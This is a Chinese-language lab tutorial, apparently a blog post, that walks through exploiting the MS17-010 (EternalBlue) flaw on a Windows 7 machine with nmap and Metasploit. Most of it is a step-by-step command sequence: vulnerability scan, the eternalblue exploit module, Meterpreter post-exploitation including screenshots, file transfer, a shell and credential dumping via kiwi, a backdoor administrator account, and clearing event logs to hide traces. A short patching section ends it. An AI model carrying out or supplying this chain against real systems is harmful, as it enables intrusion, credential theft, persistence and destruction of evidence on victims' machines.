- 靶机:Windows 7(有的版本有补丁)
- 攻击机:Kali 2021
- 首先保证可以互相ping 通
- 32位系统进去控制台会蓝屏
漏洞利用
用nmap的漏洞扫描模式,扫描过程按上下方向键即可查看扫描进度,这可能需要一点时间。
nmap --script=vuln window7ip
可以发现,靶机上扫到了4个漏洞,其中包括了永恒之蓝。
如果系统版本较高就像这样,没有ms17 -10
打开metasploit,今天怎么是个心形,作为单身狗我哭了。。。
msfconsole
搜索ms17-010相关模块,可以看到一共找到了6个不同的模块
search ms17-010
加载扫描第一个模块
use auxiliary/scanner/smb/smb_ms17_010
查看配置选项
show options
set rhosts显示远程主机未配置,配置目标主机。
set rhosts window7
rhosts => 192.168.178.128
再次扫描漏洞,确认靶机存在MS17-010漏洞。
exploit
使用永恒之蓝攻击模块:exploit/windows/smb/ms17_010_eternalblue
并设置攻击载荷:
set payload
查看选项并设置rhosts:
set rhosts 192.168.178.128
输入exploit开始攻击。
出现meterpreter >就说明已经成功了,Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
演示几个功能
- 捕获屏幕
meterpreter > screenshot
- 上传/下载文件
meterpreter > upload hello.txt c://
meterpreter > download d://1.txt
meterpreter > run vnc
获取cmd
meterpreter > shell
- 获取用户密码
meterpreter > load kiwi
Loading extension kiwi...Success.
进行后门植入(创建新的管理员账户)
net user hack 123456 /add //在windows 7上创建一个hack的用户,以便下次访问
net localgroup administrators hack /add //将hack加入到windows 7的本地管理员组中,以便获得更大权限
记得清除日志(靶机的事件查看器记录了大量的事件,需要消除痕迹)
meterpreter > clearev
修复方法
受害版本参照:点我进入查看
- 关闭445端口。
- 打开防火墙,安装安全软件。
- 安装对应补丁。